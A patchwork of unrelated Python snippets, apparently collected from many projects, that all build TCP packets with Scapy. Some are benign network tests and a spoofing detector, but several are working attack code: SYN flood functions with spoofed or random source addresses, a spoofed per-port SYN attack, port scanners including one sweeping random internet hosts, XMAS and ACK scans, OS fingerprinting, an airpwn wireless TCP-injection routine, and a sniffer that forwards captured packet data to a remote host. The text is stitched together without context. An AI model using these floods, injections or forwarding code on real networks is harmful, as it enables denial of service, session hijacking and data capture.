def handle_packet(packet):
if packet[IP].dst == LOCAL_IP and packet[IP].src == SENDER_IP:
global counter
counter = counter + 1
ip_src = packet[IP].src
ip_dst = packet[IP].dst
s_port = packet[TCP].sport
d_port = packet[TCP].dport
tcp_flags = str(packet[TCP].flags)
js = {
"ip_src": ip_src,
"ip_dst": ip_dst,
"s_port": s_port,
"d_port": d_port,
"tcp_flags": tcp_flags
}
global payload
payload = payload + "-TMA-" + json.dumps(js)
print(payload)
if counter >= 5:
send(IP(dst=REMOTE_IP) / TCP(dport=8000) / Raw(load=payload))
counter = 0
payload = ""
def attackTarget(self, port, numSyn):
# check argument types
if not (isinstance(port, int) and isinstance(numSyn, int)):
raise TypeError("Error! Parameters must be integers")
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.settimeout(0.1)
# check if port is open
try:
sock.connect((self.targetIP, port))
# otherwise, return 0
except:
return 0
# If the port is open, attack it
for i in range(
numSyn): # sends a number of SYN packets equal to numSyn
# set up packet
IP_header = IP(src=self.spoofIP, dst=self.targetIP)
TCP_header = TCP(flags="S", sport=RandShort(), dport=port)
packet = IP_header / TCP_header
# attempt to send packet; it will a message if it succeeded
try:
send(packet)
# if failed, print exception
except Exception as e:
print(e)
# returns 1 since port is open, even if packets failed to send
return 1
def SYN_TCP_Flood(self, dstIP, dstPort, counter):
try:
total = 0
print("Packets are sending ...")
for x in range(0, int(counter)):
s_port = random.randint(1000, 9000)
s_eq = random.randint(1000, 9000)
w_indow = random.randint(1000, 9000)
IP_Packet = IP()
IP_Packet.src = ".".join(
map(str, (random.randint(0, 255) for _ in range(4))))
IP_Packet.dst = dstIP
# Created our own TCP packet
TCP_Packet = TCP()
TCP_Packet.sport = s_port
TCP_Packet.dport = int(dstPort)
TCP_Packet.flags = "S"
TCP_Packet.seq = s_eq
TCP_Packet.window = w_indow
send(IP_Packet / TCP_Packet, verbose=0)
total += 1
print("\nTotal packets sent: %i\n" % total)
print()
return 1
except:
return 0
def create_stream_out(self, out_if, dst_ip=None, ttl=64):
"""
Create packet stream for outside network
:param out_if: Outside interface
:param dst_ip: Destination IP address (Default use global NAT address)
:param ttl: TTL of generated packets
"""
if dst_ip is None:
dst_ip = self.nat_addr
pkts = []
# TCP
p = (Ether(dst=out_if.local_mac, src=out_if.remote_mac) /
IP(src=out_if.remote_ip4, dst=dst_ip, ttl=ttl) /
TCP(dport=self.tcp_port_out, sport=self.tcp_external_port))
pkts.append(p)
# UDP
p = (Ether(dst=out_if.local_mac, src=out_if.remote_mac) /
IP(src=out_if.remote_ip4, dst=dst_ip, ttl=ttl) /
UDP(dport=self.udp_port_out, sport=self.udp_external_port))
pkts.append(p)
# ICMP
p = (Ether(dst=out_if.local_mac, src=out_if.remote_mac) /
IP(src=out_if.remote_ip4, dst=dst_ip, ttl=ttl) /
ICMP(id=self.icmp_external_id, type='echo-reply'))
pkts.append(p)
return pkts
def main():
"""
Main function
"""
x = Ether() / IP(dst="www.secdev.org") / TCP()
print(x.summary())
print(x.show())
data = 'test_MACsec'
pkt = Ether(dst="00:00:01:00:00:01",
src="00:10:94:00:00:02") / MACsec() / data
sendp(pkt, iface="en0", count=400)
print(pkt.summary())
print(pkt.show())
sa = MACsecSA(sci=b'\x52\x54\x00\x13\x01\x56\x00\x01', an=0, pn=100,
key=b'aaaaaaaaaaaaaaaa', icvlen=16, encrypt=1, send_sci=1)
p = Ether(src='aa:aa:aa:bb:bb:bb', dst='cc:cc:cc:dd:dd:dd')/IP(src='192.168.0.1', dst='192.168.0.2')/ICMP(type='echo-request') / \
"1234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890"
m = sa.encap(p)
print(m.type == ETH_P_MACSEC)
print(m[MACsec].type == ETH_P_IP)
print(len(m) == len(p) + 16)
print(m[MACsec].an == 0)
print(m[MACsec].pn == 100)
print(m[MACsec].shortlen == 0)
print(m[MACsec].SC)
print(m[MACsec].E)
print(m[MACsec].C)
print(m[MACsec].sci == b'\x52\x54\x00\x13\x01\x56\x00\x01')
print(p.show())
def tcpRequest(self, flags='PA', **kwargs): # {{{
"""
Get an IP base request
@param dport: the destination port
@param sport: the source port
@param flags: the flags request (default PA)
@param seq: the sequence (optional)
@param ack: the ack number
"""
dicttcp = {}
if not self._hasPort(**kwargs):
raise
seq = random.randint(1000000, 16000000)
dicttcp['dport'] = int(kwargs['port'])
dicttcp['sport'] = random.randint(1024, 65535)
dicttcp['seq'] = kwargs['seq'] if 'seq' in kwargs else seq
if self.__isKeyDict(_l='flags', **kwargs):
dicttcp['flags'] = kwargs['flags']
if self.isKeyDict(_l=['ack'], **kwargs):
dicttcp['ack'] = kwargs['ack']
if self.options['SRCPORT'][0]:
if self.isValidPort(
port=self.options['SRCPORT'][0],
interface=kwargs['interface']
):
dicttcp['sport'] = self.options['SRCPORT'][0]
return TCP(**dicttcp)
def test_iacl_proto_tcp_dport(self):
""" TCP destination port iACL test
Test scenario for basic protocol ACL with TCP and dport
- Create IPv4 stream for pg0 -> pg1 interface.
- Create iACL with TCP IP protocol and defined dport.
- Send and verify received packets on pg1 interface.
"""
# Basic iACL testing with TCP and dport
dport = 427
pkts = self.create_stream(self.pg0, self.pg1, self.pg_if_packet_sizes,
TCP(sport=1234, dport=dport))
self.pg0.add_stream(pkts)
key = 'proto_tcp_sport'
self.create_classify_table(
key, self.build_ip_mask(proto='ff', dst_port='ffff'))
self.create_classify_session(
self.acl_tbl_idx.get(key),
self.build_ip_match(proto=socket.IPPROTO_TCP, dst_port=dport))
self.input_acl_set_interface(
self.pg0, self.acl_tbl_idx.get(key))
self.acl_active_table = key
self.pg_enable_capture(self.pg_interfaces)
self.pg_start()
pkts = self.pg1.get_capture(len(pkts))
self.verify_capture(self.pg1, pkts, TCP)
self.pg0.assert_nothing_captured(remark="packets forwarded")
self.pg2.assert_nothing_captured(remark="packets forwarded")
self.pg3.assert_nothing_captured(remark="packets forwarded")
def test_max_translations_per_user(self):
""" MAX translations per user - recycle the least recently used """
self.snat_add_address(self.snat_addr)
self.vapi.snat_interface_add_del_feature(self.pg0.sw_if_index)
self.vapi.snat_interface_add_del_feature(self.pg1.sw_if_index,
is_inside=0)
# get maximum number of translations per user
snat_config = self.vapi.snat_show_config()
# send more than maximum number of translations per user packets
pkts_num = snat_config.max_translations_per_user + 5
pkts = []
for port in range(0, pkts_num):
p = (Ether(dst=self.pg0.local_mac, src=self.pg0.remote_mac) /
IP(src=self.pg0.remote_ip4, dst=self.pg1.remote_ip4) /
TCP(sport=1025 + port))
pkts.append(p)
self.pg0.add_stream(pkts)
self.pg_enable_capture(self.pg_interfaces)
self.pg_start()
# verify number of translated packet
self.pg1.get_capture(pkts_num)
def restart(self, rprob, sport):
"""Restarts all class properties to their initial state."""
self.listen_thread = None # Listener thread for incoming packets
self.sport = sport # Source port
self.state = State.LISTEN # TCP State
self.seq = random.randrange(0, 2**32) # Sequence number
self.ack = 0 # ACK number
self.ack_flag = False
self.ack_event.clear()
self.end_event.clear()
self.psh_event.clear()
self.out_pkt = IP() / TCP(
sport=sport, seq=self.seq) # Scapy packet with TCP segment
self.ingress_buffer = b'' # Buffer for ingress binary data
self.transfer_end = False
# RSTEG properties
self.retrans_prob = rprob # Probability for fake retransmission
self.secret_sent = False # Flag for secret delivery (client side)
self.secret_wait = False # Flag for secret delivery (server side)
self.secret_signal = False # Flag for secret delivery signal
self.secret_chunks = None # Buffer for RSTEG secret binary data (client side)
self.ingress_secret_buffer = b'' # Buffer for RSTEG secret binary data (server side)
self.last_payload = None # Store the payload of the signal segment (for the next checksum)
self.rt_seq = 0
self.secret_endtime = None
# RTO properties
self.timer = time.time()
self.rtt = 0
self.start_time = 0
def start_tcp(target_ip, target_port):
global sport, s_seq, d_seq #主要是用于TCP3此握手建立连接后继续发送数据
try:
#第一次握手,发送SYN包
ans = sr1(IP(dst=target_ip) / TCP(
dport=target_port, sport=RandShort(), seq=RandInt(), flags='S'),
verbose=False)
sport = ans[TCP].dport #源随机端口
s_seq = ans[TCP].ack #源序列号(其实初始值已经被服务端加1)
d_seq = ans[TCP].seq + 1 #确认号,需要把服务端的序列号加1
#第三次握手,发送ACK确认包
send(IP(dst=target_ip) / TCP(
dport=target_port, sport=sport, ack=d_seq, seq=s_seq, flags='A'),
verbose=False)
except Exception as e:
print(e)
def SYN_Flood(targetIP, targetPort, counter):
total = 0 # total number of packets sent to the target
print
"Packets are being sent to the target ..."
for x in range(0, counter):
s_port = randInt()
s_eq = randInt()
w_indow = randInt()
# randomly generate all of these values (s_port, s_eq, w_indow using randInt() function
IP_Packet = IP()
IP_Packet.src = randomIP()
# randomly generate IP address to be sending packets from
IP_Packet.dst = targetIP
TCP_Packet = TCP()
TCP_Packet.sport = s_port
TCP_Packet.dport = targetPort
TCP_Packet.flags = "S"
TCP_Packet.seq = s_eq
TCP_Packet.window = w_indow
send(IP_Packet / TCP_Packet, verbose=0)
total += 1
sys.stdout.write("\nTotal packets sent to target : %i\n" % total)
def portScanner():
packet = IP(dst="192.168.43.77") / TCP(dport=(1, 100), flags="S")
res, unans = sr(packet, timeout=1)
for a in res:
if a[1][1].flags == 18:
print(a[1].sport)
def cmd_tcpip(ip_src, ip_dst, TOS, ttl, id, reserved, seq_num, window, urg_ptr,
flags, payload, src_port):
layer3 = IP()
layer3.src = ip_src
layer3.dst = ip_dst
tos_num = int(TOS, 2)
print(tos_num)
layer3.tos = tos_num
layer3.ttl = ttl
layer3.ihl = 5
layer3.id = id
layer4 = TCP()
layer4.dport = 80
layer4.sport = src_port
num = int(reserved, 2)
binary_num = bin(num)
print(binary_num)
layer4.reserved = num
# layer4.flags = "S"
layer4.flags = flags
layer4.window = window
layer4.urgptr = int(urg_ptr, 2)
layer4.seq = seq_num
print("1")
if not payload:
pkt = layer3 / layer4
else:
pkt = layer3 / layer4 / payload
send(pkt)
def __create_packet(args, interface):
logger.info('Send to destination - [%s] on interface - [%s]',
args.destination, interface)
src_mac = args.src_mac
if not src_mac:
src_mac = get_if_hwaddr(interface)
logger.info('Device mac - [%s]', src_mac)
ip_ver = 4
ip_addr = ipaddress.ip_address(args.destination)
logger.info('Destination IP addr [%s] ([%s]) type - [%s]',
args.destination, args.destination, ip_addr.__class__)
if isinstance(ip_addr, ipaddress.IPv6Address):
ip_ver = 6
logger.info('IP version is - [%s]', ip_ver)
if args.int_hdr_file:
pkt = __gen_int_pkt(args=args, ip_ver=ip_ver, src_mac=src_mac)
else:
pkt = __gen_std_pkt(args=args, ip_ver=ip_ver, src_mac=src_mac)
if args.protocol == 'TCP':
logger.info('Generating a TCP packet')
pkt = pkt / TCP(dport=args.port, sport=args.source_port)
elif args.protocol == 'UDP':
logger.info('Generating a UDP packet')
pkt = pkt / UDP(dport=args.port, sport=args.source_port)
logger.info('Packet to emit - [%s]', pkt.summary())
return pkt / args.msg
def create_tcp_ipv4_frame(self,
ip_id,
src_ip_addr,
dst_ip_addr,
frame_size,
src_mac_addr='00:00:0A:00:0B:00',
dst_mac_addr='00:00:0A:00:0A:00'):
payload_size = frame_size - HEADER_SIZE['eth'] - HEADER_SIZE['ip'] -\
HEADER_SIZE['tcp'] - \
len(TestIPPipeline.payload_watermark)
if payload_size < 0:
payload_size = 0
frame = Ether() / IP() / TCP(
flags="") / (TestIPPipeline.payload_watermark + "X" * payload_size)
frame[Ether].src = src_mac_addr
frame[Ether].dst = dst_mac_addr
frame[IP].src = src_ip_addr
frame[IP].dst = dst_ip_addr
frame[IP].id = ip_id
# TCP ports always 0
frame[TCP].sport = 0
frame[TCP].dport = 0
return frame
def setUp(self) -> None:
eq = parse_equation("1,2,3") # f(x) = x + 2(x ^ 2) + 3
dev_eq = parse_equation("0") # f(x) = 0
layer = "UDP"
self.signature = TrafficLayerFrequencySignature(eq, dev_eq, layer)
self.trigger_packet = Ether() / IP() / UDP(dport=80)
self.no_trigger_packet = Ether() / IP() / TCP(dport=80)
def SYN_Flood(t_ip, t_port):
print("Пакеты отправляются")
global stop_thread
stop_thread = True
while stop_thread:
global packets
ip_p = IP()
ip_p.src = randomIP() # записываем в поле ip источника случайный ip
#ip_p.src = "8.8.8.8"
ip_p.dst = t_ip # записываем ip сервера
tcp_p = TCP()
#tcp_p.sport = 234
tcp_p.sport = randint(
0, 6000) # записываем в поле port источника случайный port
tcp_p.dport = t_port # записываем port сервер
tcp_p.flags = "S" # устанавливаем флаг SYN
tcp_p.seq = randint(0,
9000) # устанавливаем случайный порядковый номер ?
tcp_p.window = randint(5000, 8191) # устанавливаем случайное окно ?
send(ip_p / tcp_p, verbose=False) # отправляем пакет
packets += 1
myapp.ui.packetsCount.setText(str(packets))
# print("Пакет {0} отправлен".format(i + 1))
packets = 0
myapp.ui.packetsCount.setText(str(packets))
def test_simple_dict_get_second_element(self):
packet = (Ether(dst="ff:ff:ff:ff:ff:ff", src="00:00:00:00:00:00") /
IP(src="0.0.0.0", dst="127.0.0.1") / TCP())
packet_result = {
"IP": {
"frag": 0,
"src": "0.0.0.0",
"proto": 6,
"tos": 0,
"dst": "127.0.0.1",
"chksum": None,
"len": None,
"options": [],
"version": 4,
"flags": None,
"ihl": None,
"ttl": 64,
"id": 1,
}
}
to_dict_result = to_dict(packet, layer=1) # layer 1 is IP
self.assertTrue(isinstance(to_dict_result, dict))
self.assertEqual(to_dict_result, packet_result)
def scan_port_thread(port, count, verbose):
syn = 0x02
syn_ack = 0x12
# While we need more results
while True:
# generate new IP
ip = str(random.randint(1, 255)) + "." + str(random.randint(
0, 255)) + "." + str(random.randint(0, 255)) + "." + str(
random.randint(0, 255))
if not ipaddress.IPv4Address(ip).is_global:
continue
# Randomize source port
srcport = randint(1, 1024)
# send and receive
response = sr1(IP(dst=ip) / TCP(sport=srcport, dport=port, flags=syn),
timeout=2,
verbose=0)
# if response is not valid
if response is None or not response.haslayer(TCP):
continue
# get TCP flags
response_flags = response.getlayer(TCP).flags
# if port is open
if response_flags == syn_ack:
check_options(ip, verbose)
def scan_port(target, port, verbose):
srcport = randint(1, 1024)
syn = 0x02
syn_ack = 0x12
rst_ack = 0x14
response = sr1(IP(dst=target) / TCP(sport=srcport, dport=port, flags=syn),
timeout=1,
verbose=0)
if response is None:
if verbose:
print("[-] [{}:{}] is filtered or host is down.".format(
target, port))
return "F"
try:
response_flags = response.getlayer(TCP).flags
if response_flags == syn_ack:
if verbose:
print("[+] [{}:{}] is open (flags = SYN + ACK).".format(
target, port))
return "O"
else:
if response_flags == rst_ack:
if verbose:
print("[-] [{}:{}] is closed (flags= RST + ACK).".format(
target, port))
return "C"
# sometimes without try-except block [response = None] arrive here, so return "filtered"
except AttributeError:
if verbose:
print("[-] [{}:{}] is Filtered or host is down.".format(
target, port))
return "F"
def create_stream_in(self, in_if, out_if, ttl=64):
"""
Create packet stream for inside network
:param in_if: Inside interface
:param out_if: Outside interface
:param ttl: TTL of generated packets
"""
pkts = []
# TCP
p = (Ether(dst=in_if.local_mac, src=in_if.remote_mac) /
IP(src=in_if.remote_ip4, dst=out_if.remote_ip4, ttl=ttl) /
TCP(sport=self.tcp_port_in, dport=self.tcp_external_port))
pkts.append(p)
# UDP
p = (Ether(dst=in_if.local_mac, src=in_if.remote_mac) /
IP(src=in_if.remote_ip4, dst=out_if.remote_ip4, ttl=ttl) /
UDP(sport=self.udp_port_in, dport=self.udp_external_port))
pkts.append(p)
# ICMP
p = (Ether(dst=in_if.local_mac, src=in_if.remote_mac) /
IP(src=in_if.remote_ip4, dst=out_if.remote_ip4, ttl=ttl) /
ICMP(id=self.icmp_id_in, type='echo-request'))
pkts.append(p)
return pkts
def generate_someip_based_tcp(self, s_ip, d_ip, s_port, d_port, seq=2496318543, ack=594476641, flags="PA",
matrix=None):
vlan = Dot1Q(vlan=4)
ip = IP(src=s_ip, dst=d_ip)
tcp = TCP(flags=flags, sport=s_port, dport=d_port, seq=seq, ack=ack)
if flags == "PA": # PSH+ACK
if matrix is None:
matrix = {}
srv_id = matrix.get("srv_id", 0xffff)
method_id = matrix.get("method_id", 65535)
session_id = matrix.get("session_id", 1)
msg_type = matrix.get("msg_type", SOMEIP.TYPE_NOTIFICATION)
req_data = matrix.get("req_data", [])
someip = SOMEIP(srv_id=srv_id, sub_id=0x0,
method_id=method_id, event_id=0,
client_id=method_id, session_id=session_id,
msg_type=msg_type)
packet = b''.join([bytes().fromhex(i) for i in req_data])
target = ip / tcp / someip / packet
elif flags == "A": # ACK
target = ip / tcp
else:
target = ip / tcp
payload_length = len(target)
hex_target = hexdump(target, True)
results = hex_target.split("\n")
finalResult = []
for item in results:
finalResult.append(item.split(" ")[1])
x = " ".join(finalResult)
x_list = x.split(" ")
return payload_length, x_list
def spoof_detection(pkt):
"""
Spoof Detection Engine module: This is the main detection engine.
:param pkt:
:return:
"""
ip_ = pkt[ARP].psrc
t = datetime.datetime.now()
mac = pkt[0][ARP].hwsrc
# If the reply is an answer for an ARP request message, i.e. Full Cycle, check if the source is genuine by
# sending a TCP SYN
if ip_ in ARP_REQ_TABLE.keys() and (t - ARP_REQ_TABLE[ip_]).total_seconds() <= 5:
ip = IP(dst=ip_)
SYN = TCP(sport=40508, dport=40508, flags="S", seq=12345)
E = Ether(dst=mac)
# If we don't receive a TCP ACK, we raise an alarm message
if not srp1(E / ip / SYN, verbose=False, timeout=2):
alarm('No TCP ACK, fake IP-MAC pair')
# If we receive a TCP ACK, we add the ip and mac pair to our IP_MAC_PAIRS table
else:
IP_MAC_PAIRS[ip_] = pkt[ARP].hwsrc
# If the message is an ARP reply without an ARP request message, i.e. Half Cycle, send an ARP request for the IP
# of the source, thus causing the real owner of the IP on the network respond with an ARP reply so we can treat
# it as a Full Cycle.
else:
send(ARP(op=1, pdst=ip_), verbose=False)
def scan_port(src_ip, ip, port, interface):
src_port = RandNum(1024, 65535)
syn = TCP(sport=src_port, dport=port, flags="S")
rst = TCP(sport=src_port, dport=port, flags="R")
ip_data = IP(src=src_ip, dst=ip)
p = sr1(ip_data / syn, timeout=2, verbose=False, iface=interface)
if p:
flags = p.getlayer(TCP).flags
if flags == 0x12:
send = sr1(ip_data / rst,
timeout=2,
verbose=False,
iface=interface)
return True
return False
def _raise_alarm(alarm_event, olt, egress):
try:
frame = Ether() / Dot1Q(vlan=4000) / IP() / TCP() / Raw(load=json.dumps(alarm_event))
egress(0, frame)
except Exception as e:
log.exception('failed-to-raise-alarm', e=e)
def xmas_scan(self, ip, sport, dport):
""" Perform a XMAS scan """
XMAS = TCP(sport=sport, dport=dport, flags='FPU')
XMAS_SCAN = sr1(ip/XMAS, timeout=self.timeout, verbose=False)
# If no response, port is open | filtered
if not XMAS_SCAN:
return 'open | filtered'
else:
if XMAS_SCAN.haslayer(TCP):
flags = XMAS_SCAN.getlayer(TCP).flags
# If response is RST, port is closed
if flags == self.RST or flags == self.RSTACK:
return 'closed'
elif XMAS_SCAN.haslayer(ICMP):
ICMP_type = XMAS_SCAN.getlayer(ICMP).type
ICMP_code = XMAS_SCAN.getlayer(ICMP).code
# If response is ICMP error, port is filtered
if ICMP_type == 3 and int(ICMP_code) in [1,2,3,9,10,13]:
return 'filtered'
else:
return None
else:
return None
def nmap_sig(target, oport=80, cport=81, ucport=1):
res = {}
tcpopt = [("WScale", 10), ("NOP", None), ("MSS", 256),
("Timestamp", (123, 0))]
tests = [
IP(dst=target, id=1) / TCP(seq=1,
sport=5001 + i,
dport=oport if i < 4 else cport,
options=tcpopt,
flags=flags)
for i, flags in enumerate(["CS", "", "SFUP", "A", "S", "A", "FPU"])
]
tests.append(IP(dst=target) / UDP(sport=5008, dport=ucport) / (300 * "i"))
ans, unans = sr(tests, timeout=2)
ans.extend((x, None) for x in unans)
for snd, rcv in ans:
if snd.sport == 5008:
res["PU"] = (snd, rcv)
else:
test = "T%i" % (snd.sport - 5000)
if rcv is not None and ICMP in rcv:
warning("Test %s answered by an ICMP", test)
rcv = None
res[test] = rcv
return nmap_probes2sig(res)
def ack_scan(self, ip, sport, dport):
""" Perform an ACK scan """
ACK = TCP(dport=dport, flags='A')
ACK_SCAN = sr1(ip/ACK, timeout=self.timeout, verbose=False)
if not ACK_SCAN:
return None
else:
if ACK_SCAN.haslayer(TCP):
flags = ACK_SCAN.getlayer(TCP).flags
# If response is RST, port is unfiltered
if flags == self.RST or flags == self.RSTACK:
return 'unfiltered'
elif ACK_SCAN.haslayer(ICMP):
ICMP_type = ACK_SCAN.getlayer(ICMP).type
ICMP_code = ACK_SCAN.getlayer(ICMP).code
# If response is ICMP error, port is filtered
if ICMP_type == 3 and int(ICMP_code) in [1,2,3,9,10,13]:
return 'filtered'
else:
return None
else:
return None
def do_airpwn(p, ifto=ifto, replace=replace, ptrn=ptrn, iptrn=iptrn):
if not isinstance(p,Dot11):
return
if not p.FCfield & 1:
return
if not p.haslayer(TCP):
return
ip = p.getlayer(IP)
tcp = p.getlayer(TCP)
pay = raw(tcp.payload)
if not ptrn.match(pay):
return
if iptrn.match(pay):
return
del(p.payload.payload.payload)
p.FCfield="from-DS"
p.addr1,p.addr2 = p.addr2,p.addr1
q = p.copy()
p /= IP(src=ip.dst,dst=ip.src)
p /= TCP(sport=tcp.dport, dport=tcp.sport,
seq=tcp.ack, ack=tcp.seq+len(pay),
flags="PA")
q = p.copy()
p /= replace
q.ID += 1
q.getlayer(TCP).flags="RA"
q.getlayer(TCP).seq+=len(replace)
sendp([p,q], iface=ifto, verbose=0)
print(p.sprintf("Sent %IP.src%:%IP.sport% > %IP.dst%:%TCP.dport%"))
def _apply_tcp(self):
fields = {}
fields['sport'] = int(self.packet.tcp.source_port.value)
fields['dport'] = int(self.packet.tcp.destination_port.value)
fields['ack'] = int(self.packet.tcp.acknowledgement_number)
fields['seq'] = int(self.packet.tcp.sequence_number)
fields['urgptr'] = int(self.packet.tcp.urgent_pointer)
fields['window'] = int(self.packet.tcp.window)
fields['dataofs'] = int(self.packet.tcp.header_length)
if self.packet.tcp.valid_checksum == TGEnums.CHECKSUM_MODE.OVERRIDE:
chksum = int(self.packet.tcp.custom_checksum)
fields['chksum'] = chksum
elif self.packet.tcp.valid_checksum == TGEnums.CHECKSUM_MODE.INVALID:
fields['chksum'] = 65534
flags_list = []
if self.packet.tcp.flag_acknowledge_valid:
flags_list.append("A")
if self.packet.tcp.flag_no_more_data_from_sender:
flags_list.append("F")
if self.packet.tcp.flag_push_function:
flags_list.append("P")
if self.packet.tcp.flag_reset_connection:
flags_list.append("R")
if self.packet.tcp.flag_synchronize_sequence:
flags_list.append("S")
if self.packet.tcp.flag_urgent_pointer_valid:
flags_list.append("U")
fields['flags'] = flags_list
self._scapy_packet = self._scapy_packet / TCP(**fields)
